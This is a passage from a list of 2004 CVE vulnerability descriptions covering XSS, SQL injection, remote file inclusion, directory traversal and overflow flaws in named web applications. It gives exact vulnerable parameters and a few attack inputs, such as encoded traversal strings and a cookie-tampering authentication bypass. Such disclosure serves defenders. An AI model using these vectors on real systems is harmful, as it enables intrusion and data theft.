that may only be available to the administrators, who would have access to the path through legitimate means. [CVE-2004-1719] Multiple cross-site scripting (XSS) vulnerabilities in Merak Webmail Server 5.2.7 allow remote attackers to inject arbitrary web script or HTML via the (1) category, (2) cserver, (3) ext, (4) global, (5) showgroups, (6) or showlite parameters to address.html, or the (7) spage or (8) autoresponder parameters to settings.html, the (9) folder parameter to readmail.html, or the (10) attachmentpage_text_error parameter to attachment.html, (11) folder, (12) ct, or (13) cv parameters to calendar.html, (14) an <img> tag, or (15) the subject of an e-mail message. [CVE-2004-1716] Cross-site scripting (XSS) vulnerability in PForum before 1.26 allows remote attackers to inject arbitrary web script or HTML via the (1) IRC Server or (2) AIM ID fields in the user profile. [CVE-2004-1715] Directory traversal vulnerability in MIMEsweeper for Web before 5.0.4 allows remote attackers or local users to read arbitrary files via "..\\", "..\", and similar dot dot sequences in the URL. [CVE-2004-1711] Cross-site scripting (XSS) vulnerability in post.php in Moodle before 1.3 allows remote attackers to inject arbitrary web script or HTML via the reply parameter. [CVE-2004-1708] Webbsyte Chat 0.9.0 allows remote attackers to cause a denial of service (crash) via a large number of connections. [CVE-2004-1700] Cross-site scripting (XSS) vulnerability in SettingsBase.php in Pinnacle ShowCenter 1.51 build 121 allows remote attackers to inject arbitrary HTML or web script via the Skin parameter, which is echoed in an error message. [CVE-2004-1693] PHP remote file inclusion vulnerability in Function.php in Mambo 4.5 (1.0.9) allows remote attackers to execute arbitrary PHP code by modifying the mosConfig_absolute_path parameter to reference a URL on a remote web server that contains the code. [CVE-2004-1692] Cross-site scripting (XSS) vulnerability in index.php in Mambo 4.5 (1.0.9) allows remote attackers to inject arbitrary web script or HTML via the (1) Itemid, (2) mosmsg, or (3) limit parameters. [CVE-2004-1691] The Web Server in DNS4Me 3.0.0.4 allows remote attackers to cause a denial of service (CPU consumption and crash) via a large amount of data. [CVE-2004-1690] Cross-site scripting (XSS) vulnerability in the Web Server in DNS4Me 3.0.0.4 allows remote attackers to execute arbitrary web script or HTML via the URL. [CVE-2004-1674] viewaction.html in Merak Mail Server 7.4.5 with Icewarp Web Mail 5.2.7 and possibly other versions allows remote attackers to (1) delete arbitrary files via the originalfolder parameter or (2) move arbitrary files via the messageid parameter. [CVE-2004-1673] accountsettings_add.html in Merak Mail Server 7.4.5 with Icewarp Web Mail 5.2.7 and possibly other versions allow remote attackers to create text files with arbitrary content via the accountid parameter. [CVE-2004-1672] attachment.html in Merak Mail Server 7.4.5 with Icewarp Web Mail 5.2.7 and possibly other versions allows remote attackers to view other users' attachments by specifying the username and message ID in an HTTP request. [CVE-2004-1671] Merak Mail Server 7.4.5 with Icewarp Web Mail 5.2.7 and possibly other versions allows remote attackers to gain sensitive information via a direct request to (1) accountsettings_add.html or (2) topmenu.html. [CVE-2004-1670] Multiple directory traversal vulnerabilities Merak Mail Server 7.4.5 with Icewarp Web Mail 5.2.7, and possibly other versions, allow remote attackers to (1) create arbitrary directories via a .. (dot dot) in the user parameter to viewaction.html or (2) rename arbitrary files via a ....// (doubled dot dot) in the folderold or folder parameters to folders.html. [CVE-2004-1669] Cross-site scripting (XSS) vulnerability in MERAK Mail Server 7.4.5 with Icewarp Web Mail 5.2.7 and possibly other versions allows remote attackers to execute arbitrary web script or HTML via the (1) User name parameter to accountsettings.html or (2) Search string parameter to search.html. [CVE-2004-1665] Cross-site scripting (XSS) vulnerability in index.php in PsNews 1.1 allows remote attackers to inject arbitrary web script or HTML via the no parameter. [CVE-2004-1659] Cross-site scripting (XSS) vulnerability in index.php in CuteNews 1.3.6 and earlier allows remote attackers with Administrator, Editor, Journalist or Commenter privileges to inject arbitrary web script or HTML via the mod parameter. [CVE-2004-1657] Cross-site scripting (XSS) vulnerability in the Activity and Events Viewer for Newtelligence DasBlog allows remote attackers to inject arbitrary web script or HTML via the (1) User Agent or (2) Referrer HTTP headers. [CVE-2004-1655] Cross-site scripting (XSS) vulnerability in phpWebsite 0.9.3-4 and earlier allows remote attackers to inject arbitrary web script or HTML via the (1) CM_pid parameter in the comments module or (2) the subject or message fields in the notes module. [CVE-2004-1654] SQL injection vulnerability in the calendar module in phpWebsite 0.9.3-4 and earlier allows remote attackers to execute arbitrary SQL commands via cal_template. [CVE-2004-1651] Multiple cross-site scripting (XSS) vulnerabilities in the registration page in phpScheduleIt 1.0.0 RC1 allow remote attackers to inject arbitrary web script or HTML via the (1) Name or (2) Lastname fields during new user registration, or (3) the Schedule Name field. [CVE-2004-1648] Cross-site scripting (XSS) vulnerability in (1) index.asp, (2) ChangePassword.asp, (3) users_list.asp, (4) and users_add.asp in Password Protect allows remote attackers to inject arbitrary web script or HTML via the ShowMsg parameter. [CVE-2004-1645] Cross-site scripting (XSS) vulnerability in Xedus 1.0 allows remote attackers to execute arbitrary web script or HTML via the (1) username parameter to test.x, (2) username parameter to TestServer.x, or (3) param parameter to testgetrequest.x. [CVE-2004-1640] Multiple cross-site scripting (XSS) vulnerabilities in XOOPS 0.94 and 1.0 allow remote attackers to execute arbitrary web script and HTML via the (1) terme parameter to search.php or (2) letter parameter to letter.php. [CVE-2004-1637] The Hawking Technologies HAR11A modem/router allows remote attackers to obtain sensitive information by connecting to port 254, which displays a management interface and information on established connections. [CVE-2004-1632] Cross-site scripting (XSS) vulnerability in wiki.php in MoniWiki 1.0.8 and earlier allows remote attackers to inject arbitrary web script or HTML via the arguments to wiki.php. [CVE-2004-1630] Cross-site scripting (XSS) vulnerability in the login form in Open WorkFlow Engine (OpenWFE) 1.4.x allows remote attackers to execute arbitrary web script or HTML via the url parameter. [CVE-2004-1624] Carbon Copy 6.0.5257 does not drop system privileges when opening external programs through the help topic interface, which allows local users to gain privileges via (1) the help topic interface in CCW32.exe, which launches Notepad, or (2) the help button in the Carbon Copy Scheduler (CCSched.exe). [CVE-2004-1621] DISPUTED ** NOTE: this issue has been disputed by the vendor. Cross-site scripting (XSS) vulnerability in IBM Lotus Notes R6 and Domino R6, and possibly earlier versions, allows remote attackers to execute arbitrary web script or HTML via square brackets at the beginning and end of (1) computed for display, (2) computed when composed, or (3) computed text element fields. NOTE: the vendor has disputed this issue, saying that it is not a problem with Notes/Domino itself, but with the applications that do not properly handle this feature. [CVE-2004-1617] Lynx, lynx-ssl, and lynx-cur before 2.8.6dev.8 allow remote attackers to cause a denial of service (infinite loop) via a web page or HTML email that contains invalid HTML including (1) a TEXTAREA tag with a large COLS value and (2) a large tag name in an element that is not terminated, as demonstrated by mangleme. NOTE: a followup suggests that the relevant trigger for this issue is the large COLS value. [CVE-2004-1616] Links allows remote attackers to cause a denial of service (memory consumption) via a web page or HTML email that contains a table with a td element and a large rowspan value,as demonstrated by mangleme. [CVE-2004-1615] Opera allows remote attackers to cause a denial of service (invalid memory reference and application crash) via a web page or HTML email that contains a TBODY tag with a large COL SPAN value, as demonstrated by mangleme. [CVE-2004-1613] Mozilla allows remote attackers to cause a denial of service (application crash from null dereference or infinite loop) via a web page that contains a (1) TEXTAREA, (2) INPUT, (3) FRAMESET or (4) IMG tag followed by a null character and some trailing characters, as demonstrated by mangleme. [CVE-2004-1607] slxweb.dll in SalesLogix 6.1 allows remote attackers to obtain sensitive information via a (1) Library or (2) Attachment request with an invalid file parameter, which reveals the path in an error message. [CVE-2004-1606] slxweb.dll in SalesLogix 6.1 allows remote attackers to cause a denial service (application crash) via an invalid HTTP request, which might also leak sensitive information in the ErrorLogMsg cookie. [CVE-2004-1605] SalesLogix 6.1 allows remote attackers to bypass authentication by modifying the slxweb cookie to set user=Admin, teams=ADMIN!, and usertype=Administrator. [CVE-2004-1599] Cross-site scripting (XSS) vulnerability in index.php in CoolPHP 1.0-stable allows remote attackers to execute arbitrary web script or HTML via the (1) query or (2) nick parameters. [CVE-2004-1594] Cross-site scripting (XSS) vulnerability in FuseTalk 4.0 allows remote attackers to execute arbitrary web script via an img src tag. [CVE-2004-1593] Cross-site scripting (XSS) vulnerability in render.UserLayoutRootNode.uP in SCT Campus Pipeline allows remote attackers to inject arbitrary web script or HTML via the utf parameter. [CVE-2004-1592] PHP remote file inclusion vulnerability in index.php in ocPortal 1.0.3 and earlier allows remote attackers to execute arbitrary PHP code by modifying the req_path parameter to reference a URL on a remote web server that contains a malicious funcs.php script. [CVE-2004-1589] Cross-site scripting (XSS) vulnerability in GoSmart Message Board allows remote attackers to execute inject web script or HTML via the (1) Category parameter to Forum.asp or (2) MainMessageID parameter to ReplyToQuestion.asp. [CVE-2004-1582] PHP remote file inclusion vulnerability in BlackBoard 1.5.1 allows remote attackers to execute arbitrary PHP code by modifying the libpath parameter (incorrectly called "libpach") to reference a URL on a remote web server that contains _more.php, as demonstrated using checkdb.inc.php. [CVE-2004-1578] Cross-site scripting (XSS) vulnerability in index.php in Invision Power Board 2.0.0 allows remote attackers to execute arbitrary web script or HTML via the Referer field in the HTTP header. [CVE-2004-1566] Cross-site scripting (XSS) vulnerability in index.php in Silent Storm Portal 2.1 and 2.2 allows remote attackers to execute arbitrary web script or HTML via the module parameter. [CVE-2004-1563] Multiple cross-site scripting (XSS) vulnerabilities in w-Agora 4.1.6a allow remote attackers to execute arbitrary web script or HTML via the (1) thread parameter to download_thread.php, (2) loginuser parameter to login.php, or (3) userid parameter to forgot_password.php. [CVE-2004-1559] Multiple cross-site scripting (XSS) vulnerabilities in Wordpress 1.2 allow remote attackers to inject arbitrary web script or HTML via the (1) redirect_to, text, popupurl, or popuptitle parameters to wp-login.php, (2) redirect_url parameter to admin-header.php, (3) popuptitle, popupurl, content, or post_title parameters to bookmarklet.php, (4) cat_ID parameter to categories.php, (5) s parameter to edit.php, or (6) s or mode parameter to edit-comments.php. [CVE-2004-1557] MyWebServer 1.0.3 allows remote attackers to bypass authentication, modify configuration, and read arbitrary files via a direct HTTP request to (1) /admin or (2) ServerProperties.html. [CVE-2004-1556] MyWebServer 1.0.3 allows remote attackers to cause a denial of service (application crash) via a large number of connections within a short time. [CVE-2004-1554] PHP remote file inclusion vulnerability in livre_include.php in @lex Guestbook allows remote attackers to execute arbitrary PHP code by modifying the chem_absolu parameter to reference a URL on a remote web server that contains the code. [CVE-2004-1553] SQL injection vulnerability in aspWebAlbum allows remote attackers to execute arbitrary SQL statements via (1) the username field on the login page or (2) the cat parameter to album.asp. NOTE: it was later reported that vector 1 affects aspWebAlbum 3.2, and the vector involves the txtUserName parameter in a processlogin action to album.asp, as reachable from the login action. [CVE-2004-1552] SQL injection vulnerability in aspWebCalendar allows remote attackers to execute arbitrary SQL statements via (1) the username field on the login page or (2) the eventid parameter to calendar.asp. [CVE-2004-1551] Cross-site scripting (XSS) vulnerability in the (1) email or (2) file modules in paFileDB 3.1 Final allows remote attackers to execute arbitrary web script or HTML via the id parameter. [CVE-2004-1544] Cross-site scripting (XSS) vulnerability in Search.jsp in JSPWiki 2.1.120-cvs and earlier allows remote attackers to execute arbitrary web script as other users via the query parameter. [CVE-2004-1543] Directory traversal vulnerability in viewimg.php in KorWeblog 1.6.2-cvs and earlier allows remote attackers to list arbitrary directories via a .. (dot dot) in the path parameter. [CVE-2004-1537] Cross-site scripting (XSS) vulnerability in popup.php in PHPKIT 1.6.03 through 1.6.1 allows remote attackers to execute arbitrary web script via the img parameter. [CVE-2004-1535] PHP remote file inclusion vulnerability in admin_cash.php for the Cash Mod module for phpBB allows remote attackers to execute arbitrary PHP code by modifying the phpbb_root_path parameter to reference a URL on a remote web server that contains the code. [CVE-2004-1534] ZoneAlarm and ZoneAlarm Pro before 5.5.062, with ad-blocking enabled, allows remote web sites to cause a denial of service (application instability or system hang) via certain JavaScript. [CVE-2004-1529] Cross-site scripting (XSS) vulnerability in the Event Calendar module 2.13 for PHP-Nuke allows remote attackers to execute arbitrary web script via the (1) type, (2) day, (3) month, or (4) year parameters in a Preview operation, or (5) event comments. [CVE-2004-1527] Microsoft Internet Explorer 6.0 SP1 does not properly handle certain character strings in the Path attribute, which can cause it to modify cookies in other domains when the attacker's domain name is within the target's domain name or when wildcard DNS is being used, which allows remote attackers to hijack web sessions. [CVE-2004-1516] CRLF injection vulnerability in index.php in phpWebSite 0.9.3-4 allows remote attackers to perform HTTP Response Splitting attacks to modify expected HTML content from the server via the block_username parameter in the user module. [CVE-2004-1514] 04WebServer 1.42 allows remote attackers to cause a denial of service (fail to restart properly) via an HTTP request for an MS-DOS device name such as COM2. [CVE-2004-1513] 04WebServer 1.42 does not adequately filter data that is written to log files, which could allow remote attackers to inject carriage return characters into the log file and spoof log entries. [CVE-2004-1512] Cross-site scripting (XSS) vulnerability in Response_default.html in 04WebServer 1.42 allows remote attackers to execute arbitrary web script or HTML via script code in the URL, which is not quoted in the resulting default error page. [CVE-2004-1511] Hotfoon 4.0 does not notify users before opening links in web browsers, which could allow remote attackers to execute arbitrary code via a certian link sent in a chat window. [CVE-2004-1510] WebCalendar allows remote attackers to gain privileges by modifying critical parameters to (1) view_entry.php or (2) upcoming.php. [CVE-2004-1509] validate.php in WebCalendar allows remote attackers to gain sensitive information via an invalid encoded_login parameter, which reveals the full path in an error message. [CVE-2004-1508] init.php in WebCalendar allows remote attackers to execute arbitrary local PHP scripts via the user_inc parameter. [CVE-2004-1507] CRLF injection vulnerability in login.php in WebCalendar allows remote attackers to inject CRLF sequences via the return_path parameter and perform HTTP Response Splitting attacks to modify expected HTML content from the server. [CVE-2004-1506] Multiple cross-site scripting (XSS) vulnerabilities in WebCalendar allow remote attackers to inject arbitrary web script via (1) view_entry.php, (2) view_d.php, (3) usersel.php, (4) datesel.php, (5) trailer.php, or (6) styles.php, as demonstrated using img srg tags. [CVE-2004-1502] The Telnet proxy in 602 Lan Suite 2004.0.04.0909 and earlier allows remote attackers to cause a denial of service (socket exhaustion) via a Telnet request to an IP address of the proxy's network interface, which causes a loop. [CVE-2004-1501] The webmail service in 602 Lan Suite 2004.0.04.0909 and earlier allows remote attackers to cause a denial of service (CPU and memory consumption) by sending a POST request with a large Content-Length value, then disconnecting without sending that amount of data. [CVE-2004-1499] Cross-site scripting (XSS) vulnerability in the compose message form in HELM 3.1.19 and earlier allows remote attackers to execute arbitrary web script or HTML via the Subject field. [CVE-2004-1497] Web Forums Server 1.6 and 2.0 Power Pack stores passwords in plaintext in the Username.ini file, which allows local users to gain privileges. [CVE-2004-1496] Directory traversal vulnerability in Web Forums Server 1.6 and 2.0 Power Pack allows remote attackers to read arbitrary files via a URL containing (1) "..\" (dot dot backslash), (2) "../" (dot dot slash), (3) "/%2E%2E%5C" (encoded dot dot backslash), or (4) "%2E%2E%2F" (encoded dot dot slash). [CVE-2004-1488] wget 1.8.x and 1.9.x does not filter or quote control characters when displaying HTTP responses to the terminal, which may allow remote malicious web servers to inject terminal escape sequences and execute arbitrary code. [CVE-2004-1487] wget 1.8.x and 1.9.x allows a remote malicious web server to overwrite certain files via a redirection URL containing a ".." that resolves to the IP address of the malicious server, which bypasses wget's filtering for ".." sequences. [CVE-2004-1477] Cross-site scripting (XSS) vulnerability in the Management Console in JRun 4.0 allows remote attackers to execute arbitrary web script or HTML and possibly hijack a user's session. [CVE-2004-1472] Symantec Enterprise Firewall/VPN Appliances 100, 200, and 200R running firmware before 1.63 allow remote attackers to cause a denial of service (device freeze) via a fast UDP port scan on the WAN interface. [CVE-2004-1468] The web mail functionality in Usermin 1.x and Webmin 1.x allows remote attackers to execute arbitrary commands via shell metacharacters in an e-mail message. [CVE-2004-1467] Multiple cross-site scripting (XSS) vulnerabilities in eGroupWare 1.0.00.003 and earlier allow remote attackers to inject arbitrary web script or HTML via (1) date or search text field in the calendar module, (2) Field parameter, Filter parameter, QField parameter, Start parameter or Search field in the address module, (3) Subject field in the message module or (4) Subject field in the Ticket module. [CVE-2004-1466] The set_time_limit function in Gallery before 1.4.4_p2 deletes non-image files in a temporary directory every 30 seconds after they have been uploaded using save_photos.php, which allows remote attackers to upload and execute execute arbitrary scripts before they are deleted, if the temporary directory is under the web root. [CVE-2004-1443] Cross-site scripting (XSS) vulnerability in the inline MIME viewer in Horde-IMP (Internet Messaging Program) 3.2.4 and earlier, when used with Internet Explorer, allows remote attackers to inject arbitrary web script or HTML via an e-mail message. [CVE-2004-1442] Cross-site scripting (XSS) vulnerability in db2www CGI interpreter in IBM Net.Data 7 and 7.2 allows remote attackers to inject arbitrary web script or HTML via a macro filename, which is not properly handled by error emssages such as "DTWP001E." [CVE-2004-1441] Cross-site scripting (XSS) vulnerability in icq.cgi in Board Power 2.04PF allows remote attackers to inject arbitrary web script or HTML via the action parameter. [CVE-2004-1436] The Transaction Language 1 (TL1) login interface in Cisco ONS 15327 4.6(0) and 4.6(1) and 15454 and 15454 SDH 4.6(0) and 4.6(1), when a user account is configured with a blank password, allows remote attackers to gain unauthorized access by logging in with a password larger than 10 characters. [CVE-2004-1427] PHP remote file inclusion vulnerability in main.inc in KorWeblog 1.6.2-cvs and earlier allows remote attackers to execute arbitrary PHP code by modifying the G_PATH parameter to reference a URL on a remote web server that contains the code, as demonstrated in index.php when using .. (dot dot) sequences in the lng parameter to cause main.inc to be loaded. [CVE-2004-1426] Directory traversal vulnerability in index.php in KorWeblog 1.6.2-cvs and earlier allows remote attackers to read arbitrary files and execute arbitrary PHP files via .. (dot dot) sequences in the lng parameter. [CVE-2004-1424] Cross-site scripting (XSS) vulnerability in view.php in Moodle 1.4.2 and earlier allows remote attackers to inject arbitrary web script or HTML via the search parameter. [CVE-2004-1421] Multiple PHP remote file inclusion vulnerabilities (1) step_one.php, (2) step_one_tables.php, (3) step_two_tables.php in WHM AutoPilot 2.4.6.5 and earlier allow remote attackers to execute arbitrary PHP code by modifying the server_inc parameter to reference a URL on a remote web server that contains the code. [CVE-2004-1420] Multiple cross-site scripting (XSS) vulnerabilities in header.php in WHM AutoPilot 2.4.6.5 and earlier allow remote attackers to inject arbitrary web script or HTML via the (1) site_title or (2) http_images parameter. [CVE-2004-1419] PHP remote file inclusion vulnerability in ZeroBoard 4.1pl4 and earlier allows remote attackers to execute arbitrary PHP code by modifying the (1) _zb_path parameter to outlogin.php or (2) dir parameter to write.php to reference a URL on a remote web server that contains the code. [CVE-2004-1418] Cross-site scripting (XSS) vulnerability in WPKontakt 3.0.1 and earlier allows remote attackers to inject arbitrary web script or HTML via an e-mail address, which is not quoted when a parsing error is generated. [CVE-2004-1417] Cross-site scripting (XSS) vulnerability in login.php in PsychoStats 2.2.4 Beta and earlier allows remote attackers to inject arbitrary web script or HTML via the login parameter. [CVE-2004-1412] Cross-site scripting (XSS) vulnerability in index.php in Kayako eSupport 2.x allows remote attackers to inject arbitrary web script or HTML via the searchm parameter. [CVE-2004-1410] Cross-site scripting (XSS) vulnerability in Gadu-Gadu build 155 and earlier allows remote attackers to inject arbitrary web script via a URL, which is echoed in a popup window that displays a parsing error message, a different vulnerability than CVE-2004-1229. [CVE-2004-1409] Multiple cross-site scripting vulnerabilities in Image Gallery Web Application 0.9.10 allow remote attackers to inject arbitrary web script or HTML. [CVE-2004-1408] The addImage method for admin.class.php in Image Gallery Web Application 0.9.10 does not properly check filenames, which allows remote attackers to upload and execute arbitrary files. [CVE-2004-1407] Multiple directory traversal vulnerabilities in singapore Image Gallery Web Application 0.9.10 allow remote attackers to (1) read arbitrary files via the showThumb method for thumb.php, or (2) delete arbitrary files via admin.class.php. [CVE-2004-1403] PHP remote file inclusion vulnerability in index.php in GNUBoard 3.39 and earlier allows remote attackers to execute arbitrary PHP code by modifying the doc parameter to reference a URL on a remote web server that contains the code. [CVE-2004-1402] SQL injection vulnerability in iWebNegar allows remote attackers to execute arbitrary SQL commands via (1) the string parameter for index.php, (2) comments.php, or (3) the administrator login page. [CVE-2004-1397] Cross-site scripting (XSS) vulnerability in UseModWiki 1.0 allows remote attackers to inject arbitrary web script or HTML via an argument to wiki.pl. [CVE-2004-1389] Unknown vulnerability in the Veritas NetBackup Administrative Assistant interface for NetBackup BusinesServer 3.4, 3.4.1, and 4.5, DataCenter 3.4, 3.4.1, and 4.5, Enterprise Server 5.1, and NetBackup Server 5.0 and 5.1, allows attackers to execute arbitrary commands via the bpjava-susvc process, possibly related to the call-back feature. [CVE-2004-1385] phpGroupWare 0.9.16.003 and earlier allows remote attackers to gain sensitive information via (1) unexpected characters in the session ID such as shell metacharacters, (2) an invalid appname parameter to preferences.php or (3) an invalid menuaction parameter to index.php, which reveals the web server path in an error message. [CVE-2004-1384] Multiple cross-site scripting (XSS) vulnerabilities in phpGroupWare 0.9.16.003 and earlier allow remote attackers to inject arbitrary web script or HTML via the (1) kp3, (2) type, (3) msg, (4) forum_id, (5) pos, (6) cats_app, (7) cat_id, (8) msgball[msgnum], (9) fldball[acctnum] parameters to index.php or (10) ticket_id to viewticket_details.php. [CVE-2004-1380] Firefox before 1.0 and Mozilla before 1.7.5 allows inactive (background) tabs to launch dialog boxes, which can allow remote attackers to spoof the dialog boxes from web sites in other windows and facilitate phishing attacks, aka the "Dialog Box Spoofing Vulnerability." [CVE-2004-1350] Multiple buffer overflows in Sun Java System Web Proxy Server (formerly Sun ONE Proxy Server) 3.6 through 3.6 SP4 allow remote attackers to execute arbitrary code via unknown vectors, possibly CONNECT requests. [CVE-2004-1341] Cross-site scripting (XSS) vulnerability in info2www before 1.2.2.9 allows remote attackers to inject arbitrary web script or HTML via the arguments to info2www. [CVE-2004-1324] The Microsoft Windows Media Player 9.0 ActiveX control may allow remote attackers to execute arbitrary web script in the Local computer zone via the (1) artist or (2) song fields of a music file, if the file is processed using Internet Explorer. [CVE-2004-1319] The DHTML Edit Control (dhtmled.ocx) allows remote attackers to inject arbitrary web script into other domains by setting a name for a window, opening a child page whose target is the window with the given name, then injecting the script from the parent into the child using execScript, as demonstrated by "AbusiveParent" in Internet Explorer 6.0.2900.2180. [CVE-2004-1318] Cross-site scripting (XSS) vulnerability in namazu.cgi for Namazu 2.0.13 and earlier allows remote attackers to inject arbitrary HTML and web script via a query that starts with a tab ("%09") character, which prevents the rest of the query from being properly sanitized. [CVE-2004-1314] Safari 1.x allows remote attackers to spoof arbitrary web sites by injecting content from one window into a target window whose name is known but resides in a different domain, as demonstrated using a pop-up window on a trusted web site, aka the "window injection" vulnerability, a different vulnerability than CVE-2004-1122. [CVE-2004-1303] Buffer overflow in the get function in get.c for Yanf 0.4 allows remote malicious web servers to execute arbitrary code via crafted HTTP responses. [CVE-2004-1299] Buffer overflow in the get_attr function in html.c for vilistextum 2.6.6 allows remote attackers to execute arbitrary code via a crafted web page. [CVE-2004-1295] The slip_down function in slip.c for the uml_net program in uml-utilities 20030903, when uml_net is installed setuid root, does not verify whether the calling user has sufficient permission to disable an interface, which allows local users to cause a denial of service (network service disabled). [CVE-2004-1290] Buffer overflow in the process_moves function in pgn2web.c for pgn2web 0.3 allows remote attackers to execute arbitrary code via a crafted PGN file. [CVE-2004-1229] Cross-site scripting vulnerability in the parser for Gadu-Gadu allows remote attackers to inject arbitrary web script or HTML via (1) http:// or (2) news:// URLs, a different vulnerability than CVE-2004-1410. [CVE-2004-1223] The Management Agent in F-Secure Policy Manager 5.11.2810 allows remote attackers to gain sensitive information, such as the absolute path for the web server, via an HTTP request to fsmsh.dll without any parameters. [CVE-2004-1222] weblibs.pl in WebLibs 1.0 allows remote attackers to execute arbitrary commands via shell metacharacters in the TextFile parameter. [CVE-2004-1221] Directory traversal vulnerability in weblibs.pl in WebLibs 1.0 allows remote attackers to read arbitrary files via .. sequences in the TextFile parameter. [CVE-2004-1213] Cross-site scripting (XSS) vulnerability in index.php in Advanced Guestbook 2.3.1, 2.2, and possibly other versions allows remote attackers to inject arbitrary web script or HTML via the entry parameter. [CVE-2004-1210] Cross-site scripting (XSS) vulnerability in proxylog.dat in IPCop 1.4.1 and possibly other versions, allows remote attackers to inject arbitrary web script or HTML via the (1) url or (2) part variables. [CVE-2004-1203] parser.php in phpCMS 1.2.1 and earlier, with non-stealth and debug modes enabled, allows remote attackers to gain sensitive information via an invalid file parameter, which reveals the web server's installation path. [CVE-2004-1202] Cross-site scripting (XSS) vulnerability in parser.php in phpCMS 1.2.1 and earlier, with non-stealth and debug modes enabled, allows remote attackers to inject arbitrary web script or HTML via the file parameter. [CVE-2004-1197] Cross-site scripting (XSS) vulnerability in inshop.pl in Insite inShop allows remote attackers to inject arbitrary web script or HTML via the screen parameter. [CVE-2004-1196] Cross-site scripting (XSS) vulnerability in inmail.pl in Insite Inmail allows remote attackers to inject arbitrary web script or HTML via the acao parameter. [CVE-2004-1177] Cross-site scripting (XSS) vulnerability in the driver script in mailman before 2.1.5 allows remote attackers to inject arbitrary web script or HTML via a URL, which is not properly escaped in the resulting error page. [CVE-2004-1169] MaxDB WebTools 7.5.00.18 and earlier allows remote attackers to cause a denial of service (application crash) via an HTTP GET request for a file that does not exist, followed by two carriage returns, which causes a NULL dereference. [CVE-2004-1168] Stack-based buffer overflow in the WebDav handler in MaxDB WebTools 7.5.00.18 and earlier allows remote attackers to execute arbitrary code via a long Overwrite header. [CVE-2004-1160] Netscape 7.x to 7.2, and possibly other versions, allows remote attackers to spoof arbitrary web sites by injecting content from one window into a target window whose name is known but resides in a different domain, as demonstrated using a pop-up window on a trusted web site, aka the "window injection" vulnerability. [CVE-2004-1158] Konqueror 3.x up to 3.2.2-6, and possibly other versions, allows remote attackers to spoof arbitrary web sites by injecting content from one window into a target window or tab whose name is known but resides in a different domain, as demonstrated using a pop-up window on a trusted web site, aka the "window injection" vulnerability. [CVE-2004-1157] Opera 7.x up to 7.54, and possibly other versions, allows remote attackers to spoof arbitrary web sites by injecting content from one window into a target window whose name is known but resides in a different domain, as demonstrated using a pop-up window on a trusted web site, aka the "window injection" vulnerability. [CVE-2004-1156] Mozilla before 1.7.6, and Firefox before 1.0.1, allows remote attackers to spoof arbitrary web sites by injecting content from one window into a target window whose name is known but resides in a different domain, as demonstrated using a pop-up window on a trusted web site, aka the "window injection" vulnerability. [CVE-2004-1155] Internet Explorer 5.01 through 6 allows remote attackers to spoof arbitrary web sites by injecting content from one window into another window whose name is known but resides in a different domain, as demonstrated using a pop-up window on a trusted web site, aka the "window injection" vulnerability. NOTE: later research shows that Internet Explorer 7 on Windows XP SP2 is also vulnerable. [CVE-2004-1146] Multiple cross-site scripting (XSS) vulnerabilities in (1) main.c and (2) login.c for CVSTrac before 1.1.5 allow remote attackers to inject arbitrary HTML and web script. [CVE-2004-1133] Multiple cross-site scripting (XSS) vulnerabilities in Microsoft W3Who ISAPI (w3who.dll) allow remote attackers to inject arbitrary HTML and web script via (1) HTTP headers such as "Connection" or (2) invalid parameters whose values are echoed in the resulting error message. [CVE-2004-1130] Cross-site scripting (XSS) vulnerability in admin.asp in CMailServer 5.2 allows remote attackers to execute arbitrary web script or HTML via personal information fields, such as (1) username, (2) name, or (3) comments. [CVE-2004-1122] Safari 1.x to 1.2.4, and possibly other versions, allows inactive windows to launch dialog boxes, which can allow remote attackers to spoof the dialog boxes from web sites in other windows, aka the "Dialog Box Spoofing Vulnerability," a different vulnerability than CVE-2004-1314. [CVE-2004-1106] Cross-site scripting (XSS) vulnerability in Gallery 1.4.4-pl3 and earlier allows remote attackers to execute arbitrary web script or HTML via "specially formed URLs," possibly via the include parameter in index.php. [CVE-2004-1104] Microsoft Internet Explorer 6.0 SP2 allows remote attackers to spoof a legitimate URL in the status bar and conduct a phishing attack via a web page that contains a BASE element that points to the legitimate site, followed by an anchor (a) element with an empty "href" attribute, and a FORM whose action points to a malicious URL, and an INPUT submit element that is modified to look like a legitimate URL. [CVE-2004-1103] MailPost 5.1.1sv, and possibly earlier versions, when debug mode is enabled, allows remote attackers to gain sensitive information via the debug parameter, which reveals information such as the path to the web root and the web server version. [CVE-2004-1101] mailpost.exe in MailPost 5.1.1sv, and possibly earlier versions, allows remote attackers to cause a denial of service (server crash), leak sensitive pathname information in the resulting error message, and execute a cross-site scripting (XSS) attack via an HTTP request that contains a / (backslash) and arbitrary webscript before the requested file, which leaks the pathname and does not quote the script in the resulting Visual Basic error message. [CVE-2004-1100] Cross-site scripting (XSS) vulnerability in mailpost.exe in MailPost 5.1.1sv, and possibly earlier versions, when debug mode is enabled, allows remote attackers to execute arbitrary web script or HTML via the append parameter. [CVE-2004-1085] Human Interface Toolbox (HIToolBox) for Apple Mac 0S X 10.3.6 allows local users to exit applications via the force-quit key combination, even when the system is running in kiosk mode. [CVE-2004-1075] Cross-site scripting (XSS) vulnerability in standard_error_message.dtml for Zwiki after 0.10.0rc1 to 0.36.2 allows remote attackers to inject arbitrary HTML and web script via a malformed URL, which is not properly cleansed when generating an error message. [CVE-2004-1063] PHP 4.x to 4.3.9, and PHP 5.x to 5.0.2, when running in safe mode on a multithreaded Unix webserver, allows local users to bypass safe_mode_exec_dir restrictions and execute commands outside of the intended safe_mode_exec_dir via shell metacharacters in the current directory name. NOTE: this issue was originally REJECTed by its CNA before publication, but that decision is in active dispute. This candidate may change significantly in the future as a result of further discussion. [CVE-2004-1062] Multiple cross-site scripting (XSS) vulnerabilities in ViewCVS 0.9.2 allow remote attackers to inject arbitrary HTML and web script via certain error messages. [CVE-2004-1061] Cross-site scripting (XSS) vulnerability in Bugzilla before 2.18, including 2.16.x before 2.16.11, allows remote attackers to inject arbitrary HTML and web script via forced error messages, as demonstrated using the action parameter. [CVE-2004-1059] Multiple cross-site scripting (XSS) vulnerabilities in mnoGoSearch 3.2.26 and earlier allow remote attackers to inject arbitrary HTML and web script via the (1) next and (2) prev result search pages, and the (3) extended and (4) simple search forms. [CVE-2004-1055] Multiple cross-site scripting (XSS) vulnerabilities in phpMyAdmin 2.6.0-pl2 and earlier allow remote attackers to inject arbitrary web script or HTML via (1) the PmaAbsoluteUri parameter, (2) the zero_rows parameter in read_dump.php, (3) the confirm form, or (4) an error message generated by the internal phpMyAdmin parser. [CVE-2004-1036] Cross-site scripting (XSS) vulnerability in the decoding of encoded text in certain headers in mime.php for SquirrelMail 1.4.3a and 